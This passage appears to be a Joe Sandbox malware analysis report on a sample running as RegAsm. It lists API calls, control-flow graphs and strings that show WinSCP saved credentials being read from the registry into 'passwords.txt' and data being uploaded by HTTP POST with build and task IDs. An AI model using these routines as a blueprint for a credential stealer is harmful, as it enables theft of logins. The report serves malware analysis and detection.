                                                        • Sleep.KERNEL32(0000000C), ref: 00415D58
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D5F
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D66
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D6D
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D74
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D7B
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D82
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D89
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D90
                                                        • Sleep.KERNEL32(0000000C), ref: 00415D97
                                                        • CloseHandle.KERNEL32(00000000), ref: 00415D9E
                                                        • ExitProcess.KERNEL32 ref: 00415DA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$AddressProc$Heap$Process$File$CloseCreateEventLibraryLoadWindowlstrcpy$ExitHandleMessageOpenmemsetstrcmp$AllocAllocateByteChangeCharClassContextConvertCountCriticalDefaultDialogErrorFindFreeHelpLastLocaleLongMultiNameNotificationPathReadRegisterSectionSpinTempUserVisibleWideWrite_time64lstrcatlstrlenrandsrandwsprintf
                                                        • String ID: GetSystemInfo$GetSystemTime$Sleep$kernel32.dll
                                                        • API String ID: 711114340-3066453820
                                                        • Opcode ID: 9b9b6801296921b786f0f060af40fcd45910b0ce98f5f00650fe79146c100a96
                                                        • Instruction ID: 1e6d3716cd7994fd3d5a4b6adab9fbdb94ad6c23ef9d1c1212de6ab6a5c07b7a
                                                        • Opcode Fuzzy Hash: 9b9b6801296921b786f0f060af40fcd45910b0ce98f5f00650fe79146c100a96
                                                        • Instruction Fuzzy Hash: DAF1A072513524ABE7117BB1EC4ECDE3B7EAE5B7067003415F20A91061DBB806828FFA
                                                        Function 004020FD Relevance: 142.0, APIs: 80, Strings: 1, Instructions: 207stringmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strlen$Heap$AllocateProcesslstrlen
                                                        • String ID: In the interim between those two positions, she studied public health at Witswatersrand Advanced Technikon in 1971, and during her time there, she won an award from the South African Institute of Public Health for obtaining the highest marks in the country
                                                        • API String ID: 2756412249-2286045530
                                                        • Opcode ID: 4cd2810668b5a7fdda0f0d7ca14b729dc8ffda0e8ff842d7a95c373b8aede1bc
                                                        • Instruction ID: 87892b8925cf63481841c46467c99ca63a10ba7c7221643efd28e559847cb670
                                                        • Opcode Fuzzy Hash: 4cd2810668b5a7fdda0f0d7ca14b729dc8ffda0e8ff842d7a95c373b8aede1bc
                                                        • Instruction Fuzzy Hash: B851F0355039397ED6027FF6CC42AEF7A585F46308B14405AFC28E2203DA6C57A266AF
                                                        Function 0040D478 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 376registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • memset.MSVCRT ref: 0040D49C
                                                        • memset.MSVCRT ref: 0040D4BC
                                                        • memset.MSVCRT ref: 0040D4D0
                                                        • memset.MSVCRT ref: 0040D4E4
                                                        • memset.MSVCRT ref: 0040D4F3
                                                        • memset.MSVCRT ref: 0040D501
                                                        • memset.MSVCRT ref: 0040D512
                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040D53A
                                                        • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040D562
                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040D5A9
                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040D5C6
                                                        • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,0041E266), ref: 0040D644
                                                        • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040D68E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: memset$Value$Open$Enum
                                                        • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                        • API String ID: 1825623393-2798830873
                                                        • Opcode ID: 5cfa0403c7de89bdd09b720f89dd01f882f32cafce791135f75e4858f8af02d7
                                                        • Instruction ID: 0985638acea9c0ac8f816c78a377ffb46bd6568393859a904728d0247cf97082
                                                        • Opcode Fuzzy Hash: 5cfa0403c7de89bdd09b720f89dd01f882f32cafce791135f75e4858f8af02d7
                                                        • Instruction Fuzzy Hash: FCD1EBB2D0012DAADB11EB91DD81EEFB77CAF24348F40096BB516B2091EA345F58CF65
                                                        Function 004046CF Relevance: 58.4, APIs: 25, Strings: 8, Instructions: 668stringnetworkmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 883 4046cf-404797 call 40e58f call 40e5c6 call 403f08 call 40f8d5 call 40e778 lstrlenA call 40e778 call 40f8d5 call 40e58f * 4 StrCmpCA 906 404799 883->906 907 40479a-40479f 883->907 906->907 908 4047a1-4047b9 call 40e778 InternetOpenA 907->908 909 4047bf-40489b call 40f6c3 call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e694 call 40e6e6 call 40e64d call 40e5fa * 3 call 40e6e6 call 40e694 call 40e64d call 40e5fa * 2 InternetConnectA 907->909 908->909 914 404e70-404ead call 40f5fb * 2 call 40e73f * 4 call 40e5c6 908->914 909->914 978 4048a1-4048d5 HttpOpenRequestA 909->978 943 404eb2-404f01 call 40e5fa * 9 914->943 980 404e67-404e6a InternetCloseHandle 978->980 981 4048db-4048dd 978->981 980->914 982 4048f5-404dc9 call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 402033 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e778 lstrlenA call 40e778 lstrlenA GetProcessHeap HeapAlloc call 40e778 lstrlenA call 40e778 memcpy call 40e778 lstrlenA memcpy call 40e778 lstrlenA call 40e778 * 2 lstrlenA memcpy call 40e778 lstrlenA call 40e778 HttpSendRequestA call 40f5fb HttpQueryInfoA 981->982 983 4048df-4048ef InternetSetOptionA 981->983 1188 404dcb-404dd8 call 40e58f 982->1188 1189 404ddd-404def call 40f5de 982->1189 983->982 1188->943 1189->1188 1194 404df1-404df6 1189->1194 1195 404e2a-404e3f InternetReadFile 1194->1195 1196 404e41-404e57 call 40e778 StrCmpCA 1195->1196 1197 404df8-404dfd 1195->1197 1203 404e60-404e61 InternetCloseHandle 1196->1203 1204 404e59-404e5a ExitProcess 1196->1204 1197->1196 1199 404dff-404e25 call 40e6e6 call 40e64d call 40e5fa 1197->1199 1199->1195 1203->980
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F34
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F3D
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F46
                                                          • Part of subcall function 00403F08: lstrlenA.KERNEL32(00000000,00000000,?,?,00421C30,ERROR), ref: 00403F60
                                                          • Part of subcall function 00403F08: InternetCrackUrlA.WININET(00000000,00000000,?,00421C30), ref: 00403F70
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 0040473D
                                                          • Part of subcall function 0040F8D5: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040F8F9
                                                          • Part of subcall function 0040F8D5: GetProcessHeap.KERNEL32(00000000,?,?,00404731,?,?,?,?,?,?,?,?,00000030), ref: 0040F906
                                                          • Part of subcall function 0040F8D5: HeapAlloc.KERNEL32(00000000,?,00404731,?,?,?,?,?,?,?,?,00000030), ref: 0040F90D
                                                        • StrCmpCA.SHLWAPI(?,0041E266,0041E266,0041E266,0041E266), ref: 0040478F
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004047AF
                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404890
                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004048CA
                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004048EF
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                        • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00421360,00000000,?,?,00000000), ref: 00404CCD
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00404CDE
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00404CED
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00404CF4
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00404D06
                                                        • memcpy.MSVCRT ref: 00404D19
                                                        • lstrlenA.KERNEL32(00000000,?,?), ref: 00404D30
                                                        • memcpy.MSVCRT ref: 00404D3A
                                                        • lstrlenA.KERNEL32(00000000), ref: 00404D4B
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404D64
                                                        • memcpy.MSVCRT ref: 00404D71
                                                        • lstrlenA.KERNEL32(00000000,?,?), ref: 00404D86
                                                        • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00404D9A
                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00404DC1
                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00404E37
                                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00404E4F
                                                        • ExitProcess.KERNEL32 ref: 00404E5A
                                                        • InternetCloseHandle.WININET(?), ref: 00404E6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                        • String ID: ------$"$--$------$ERROR$block$build_id$file_data
                                                        • API String ID: 1836692184-1063948816
                                                        • Opcode ID: 7942acd88c61cea0c888b21c1ad26957ea90e5eba3c8840ae14aec87af230ac3
                                                        • Instruction ID: ea70925a17a923020a55cd6e0055ea87a9b9195929ed26f650c9b855e5c772bd
                                                        • Opcode Fuzzy Hash: 7942acd88c61cea0c888b21c1ad26957ea90e5eba3c8840ae14aec87af230ac3
                                                        • Instruction Fuzzy Hash: 4432BD72C00019AACB15EBE2DC96CEE777DAF24308F50493BF516B20D1EF396659CA94
                                                        Function 0040520F Relevance: 49.7, APIs: 20, Strings: 8, Instructions: 731networkstringmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1208 40520f-4052a9 call 40e5c6 call 403f08 call 40e58f * 5 call 40e778 InternetOpenA StrCmpCA 1225 4052ab 1208->1225 1226 4052ae-4052b1 1208->1226 1225->1226 1227 4052b7-4053ef call 40f6c3 call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e694 call 40e64d call 40e5fa * 2 InternetConnectA 1226->1227 1228 405a48-405a6e InternetCloseHandle call 40e778 call 406a53 1226->1228 1227->1228 1312 4053f5-405427 HttpOpenRequestA 1227->1312 1237 405a70-405a91 call 40e603 call 40e6e6 call 40e64d call 40e5fa 1228->1237 1238 405a96-405af8 call 40f5fb * 2 call 40e5fa * 4 call 401301 call 40e5fa * 3 1228->1238 1237->1238 1313 40542d-405431 1312->1313 1314 405a3f-405a42 InternetCloseHandle 1312->1314 1315 405433-405443 InternetSetOptionA 1313->1315 1316 405449-4059e7 call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 402033 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e778 lstrlenA call 40e778 lstrlenA GetProcessHeap HeapAlloc call 40e778 lstrlenA call 40e778 memcpy call 40e778 lstrlenA call 40e778 * 2 lstrlenA memcpy call 40e778 lstrlenA call 40e778 HttpSendRequestA 1313->1316 1314->1228 1315->1316 1571 405a1c-405a31 InternetReadFile 1316->1571 1572 405a33-405a3a InternetCloseHandle 1571->1572 1573 4059e9-4059ee 1571->1573 1572->1314 1573->1572 1574 4059f0-405a17 call 40e6e6 call 40e64d call 40e5fa 1573->1574 1574->1571
                                                        APIs
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F34
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F3D
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F46
                                                          • Part of subcall function 00403F08: lstrlenA.KERNEL32(00000000,00000000,?,?,00421C30,ERROR), ref: 00403F60
                                                          • Part of subcall function 00403F08: InternetCrackUrlA.WININET(00000000,00000000,?,00421C30), ref: 00403F70
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405289
                                                        • StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00000030), ref: 004052A1
                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004053E2
                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 0040541C
                                                        • lstrlenA.KERNEL32(00000000,00000000,!A,?,00000000,!A,",00000000,!A,status,00000000,!A,00000000,!A,00421360,00000000), ref: 0040593D
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000030), ref: 0040594E
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000030), ref: 00405959
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000030), ref: 00405960
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000030), ref: 00405971
                                                        • memcpy.MSVCRT ref: 00405982
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000030), ref: 00405993
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000030), ref: 004059AC
                                                        • memcpy.MSVCRT ref: 004059B5
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 004059C8
                                                        • HttpSendRequestA.WININET(?,00000000,00000000), ref: 004059DC
                                                        • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 00405A29
                                                        • InternetCloseHandle.WININET(?), ref: 00405A34
                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405443
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                        • InternetCloseHandle.WININET(?), ref: 00405A42
                                                        • InternetCloseHandle.WININET(?), ref: 00405A4B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                        • String ID: !A$!A$"$------$build_id$mode$status$task_id
                                                        • API String ID: 487080699-478583267
                                                        • Opcode ID: 1ccb8435d303943b7085e307f247825008ac4bf759d5c253d8081170025ccc43
                                                        • Instruction ID: b6f7c7578708ddc1654232fb3bbc6ef0109fe4e6d37b84b8f0c3140b83c57a11
                                                        • Opcode Fuzzy Hash: 1ccb8435d303943b7085e307f247825008ac4bf759d5c253d8081170025ccc43
                                                        • Instruction Fuzzy Hash: ED429D72C00019AACB15EBE2DC92CEF777DAF24308F40497BB516B20D1EF356655CA99
                                                        Function 00415E5B Relevance: 48.2, APIs: 32, Instructions: 153libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
